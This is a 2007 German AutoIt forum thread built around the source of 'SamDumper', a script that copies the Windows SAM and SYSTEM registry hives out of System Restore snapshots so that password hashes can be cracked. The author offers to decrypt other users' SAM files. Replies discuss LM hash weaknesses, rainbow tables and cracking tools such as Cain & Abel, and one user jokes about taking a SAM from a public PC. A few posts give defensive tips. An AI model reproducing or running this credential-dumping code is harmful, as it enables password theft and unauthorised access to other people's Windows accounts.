SamDumper

  • Dieses kleine tool kopiert die SAM durch eine Schwachstelle von Microsoft.
    In der SAM sind alle W$ passwörter gespeichert, man muss sie nurnoch decrypten (Goooogle

    Bugfix und ich habes gemeinsam dran gebastelt, also heißt der autor:

    Buggy oder
    Hugfix


    hier das Script:

    [autoit]

    ; SamDumper V. 2.0 by Buggy (Huggy + Bugfix)
    #include <Array.au3>
    #include <File.au3>
    #include <Process.au3>
    Dim $arZahl[1], $array, $var, $max, $Pfad
    $arZahl[0] = ''
    $array = _FileListToArray("C:\system~1\_resto~1\","*", 2)
    For $i = 1 To $array[0]
    $var = StringSplit($array[$i], "P")
    If $arZahl[0] = '' Then
    $arZahl[0] = Number($var[2])
    Else
    _ArrayAdd($arZahl, $var[2])
    EndIf
    Next
    $max = _ArrayMax($arZahl, 1)
    $Pfad = "C:\system~1\_resto~1\RP" & $max
    $SAM = $pfad & "\snapshot"
    SplashTextOn("Running...", "SamDumper (V 2.0) is running...wait plz", 500,100)
    FileWrite($SAM & "\run.bat", "@echo off" & @Crlf & "copy _REGISTRY_MACHINE_SAM SAM.txt")
    FileWrite($SAM & "\run2.bat", "@echo off" & @Crlf & "copy _REGISTRY_MACHINE_SYSTEM System.txt")
    Run($SAM & "\run.bat", $SAM)
    sleep(1000)
    Run($SAM & "\run2.bat", $SAM)
    sleep(2000)
    FileCopy($SAM & "\SAM.txt", @ScriptDir & "\SAM.txt")
    FileCopy($SAM & "\System.txt", @ScriptDir & "\System.txt")

    [/autoit][autoit][/autoit][autoit][/autoit][autoit][/autoit][autoit][/autoit][autoit][/autoit][autoit][/autoit][autoit][/autoit][autoit][/autoit][autoit]

    SplashOff()

    [/autoit][autoit][/autoit][autoit][/autoit][autoit][/autoit][autoit]

    FileDelete($SAM & "\run.bat")
    sleep(200)
    FileDelete($SAM & "\run2.bat")

    [/autoit]


    ich hoffe, dass das Script nicht unsachgemäß genutzt wird...


    Wenn ihr aktiv @ forum seid, würd ich mich bereitstellen eure SAM zu decrypten - so könnt ihr auch rausfinden, ob euer PW sicher ist.

    dazu einfach die SAM.txt posten und sagen, welcher benutzer decrypted werden soll :)

    mfg


    Buggy (arghs, dieser Name^^)

    4 Mal editiert, zuletzt von huggy (18. Mai 2007 um 14:06)

  • Hallo.

    Ich bin gerade voll aus dem Konzept.

    SamDumper ? Muß ich wissen und verstehen !!!

    Zeile 19: ... plz ...
    warten auf plz? Verstehe ich nicht !!! Ist das eine Abkürzung???
    Die run.bat muß doch irgendeinen Kopiebefehl haben, oder irre ich da auch?

    Zeile 20: ... \run.bat ...
    Dann brauche ich doch die Batchdatei, oder irre ich da?


    Ich glaube ich stehe gerade irgendwie neben mir. Ich glaube ich sollte schlafen gehen.

    Liebe Grüße,

    Lina.

    Lieben Gruß,
    Alina

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Geheime Information: ;)
    OuBVU5ebLhHu5QvlnAyQB4A7SzBrvWulwL7RLl2BdH5tI6sIYspeMKeXMSXl

    • Offizieller Beitrag

    Hallo!

    plz ist Netzjargon und steht für please.

    Die run.bat wird in Zeile 20 erstellt.

  • Hallo Bernd.

    Jetzt verstehe ich alles irgendwie. Hat ja die AutoIT-Doku als pdf zum nachschlagen. Noch dauert das verstehen ab und an echt lang, aber es kommt schon. Und jetzt werde ich auch nicht mehr bei PLZ an diese doofen fünfstelliegen Postleitzahlen denken. Ich wollte mich damals mal bei "Wetten das...?" bewerben, das ich für jede Stadt die Postleitzahlen auswendig kann. Und was macht die Deutsche Post AG? Stellen mal kurz auf fünf Stellen um. Da denke ich doch bei PLZ jetzt lieber an das Wort "Please".

    LG Lina.

    Lieben Gruß,
    Alina

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Geheime Information: ;)
    OuBVU5ebLhHu5QvlnAyQB4A7SzBrvWulwL7RLl2BdH5tI6sIYspeMKeXMSXl

    Einmal editiert, zuletzt von Alina (19. Mai 2007 um 19:46)

  • V 2.0 released :P

    Hab einen schweren fehler behoben, weil ich eine wichtige datei vergessen habe (system)

    Gta und Grunge, bitte schickt mir per PN nochmal die beiden zu...
    (SAM.txt und SYSTEM.txt)

    Danke für die Geduld *GG*

    ausserdem hab ich nen rechtschreibfehler behoben (thx @gta :P)

  • Hallo.

    Gibt es bei der SAM nicht irgendwie eine Grenze, wo sich der Password-Scann zeitlich ins Unendliche geht? Also wenn man das Passwort nicht gerade nur aus 8 Eingaben bestehen läßt, sondern 16 Eingaben (Passwortlänge) erzwingt (zum Beispiel in Firmen), dann sollte es doch ein Problem sein, mal so kurz die SAM auszulesen.

    Habe eine Software getestet, die brachte bei einer Länge von 8 Eingaben gerade einmal 2-3 Sekunden, bei längeren Passwörtern dauert es dann doch schon Minuten / Stunden. Gut das ich es das erste mal nicht daheim ausprobiert habe, sondern an einem öffentlichen PC. ;) Na klar nur mit dem Hintergrund, wenn was im Programm falsch läuft, nicht mein PC abschmierkelt. *LOL*

    Aber ist echt cool. Was man so alles sucht, als unwissende Person, um das zu finden, was man gerade benötigt. Ich glaub der Satz ist irgendwie schei.... geschrieben, aber mir fällt kein anderer Satz ein, der das alles aussagt. ;)

    Und wißt ihr was, Euer Programm ist cool. Kann man sich mal ein SAM mit nach hause nehmen. LOL


    Liebe Grüße, Lina.

    Lieben Gruß,
    Alina

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Geheime Information: ;)
    OuBVU5ebLhHu5QvlnAyQB4A7SzBrvWulwL7RLl2BdH5tI6sIYspeMKeXMSXl

  • die SAM ist verschlüsselt, und es ist ganz egal wie lang das passwort ist, das Dumpen der SAM dauert gleich lang.

    Derzeit gibts ein Problem mit dem Zusammenspiel von SYSTEM und SAM, und wenn man sich nicht auslkennt is es fast unmöglich die SAM zu entschlüsseln.

  • Hallo Huggy.

    Entweder habe ich Dich falsch verstanden oder ich muß Dir mal wiedersprechen. Sorry, möchte nicht das letzte Wort haben (Frau), sondern Stellung beziehen.

    Okay, das Dumpen geht fix, da habe ich mich vielleicht falsch ausgedrückt, aber das entschlüsseln kann sehr lange dauern. Deshalb ein möglichst sinnloses und langes Passwort nehmen. Und ich habe es schon richtig verstanden, ins Eingabefeld für das Passwort schreibt man nicht [Passwort]. Nicht das das noch gedacht wird. LOL

    Liebe Grüße, Lina.

    Lieben Gruß,
    Alina

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Geheime Information: ;)
    OuBVU5ebLhHu5QvlnAyQB4A7SzBrvWulwL7RLl2BdH5tI6sIYspeMKeXMSXl

    • Offizieller Beitrag

    Hi!

    Problem ist meines Wissens folgendes:
    Um im Netzwerk kompatibel zu alten Windows-Versionen zu sein speichert Windows das Passwort nciht nur komplett gehasht, sondern auch einen Hash der ersten 8 (oder 11) Zeichen. Daher hilft ein längeres Passwort nicht. Mit den Hashtables ist das dann schnell geknackt.

    peethebee

  • Muss dir widersprechen, alle 7 Zeichen wird n neuer hash eröffnet ;)

    Und durch 40 gb LM und 150 gb MD5 tables (alpha numeric, all-space)
    geht das recht fix :)

    wenn mal die System datei mitspielt :((

  • Oh manno. wie sichere ich mich jetzt dagegen?

    LG Lina

    Lieben Gruß,
    Alina

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Geheime Information: ;)
    OuBVU5ebLhHu5QvlnAyQB4A7SzBrvWulwL7RLl2BdH5tI6sIYspeMKeXMSXl

  • Hmmm --> Systemwiederherstellung deaktivieren,
    oder einfach rechte wegnehmen für gastaccs

  • Okay, Huggy,

    habe ich gerade gemacht. Systemwiederherstellung ist deaktiviert und Gastaccounts erstens deaktiviert und hat zweitens eh keine Rechts.

    Da ist mein PC und nicht der des Gastes.

    LG Lina

    Lieben Gruß,
    Alina

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Geheime Information: ;)
    OuBVU5ebLhHu5QvlnAyQB4A7SzBrvWulwL7RLl2BdH5tI6sIYspeMKeXMSXl

  • Wenns eh nur dein PC is, würd ich die systemwiederherstellung aktivieren -.-


    Oder kommt der böse mann, macht deinen PC an und dumpt deine sam?


    Jeder der bisschen ahnung hat und einfach nur daten stehlen mag, es schnell gehen muss löscht entweder das passwort mit programmen oder macht es mit Linux live cds ...

  • Doppelklick drauf, öffent im editor.

    dann siehst du die benutzernamen im klartext, oder du benutzt Cain & abel (schwerer) oderdie easy variante:

    SamINSIDE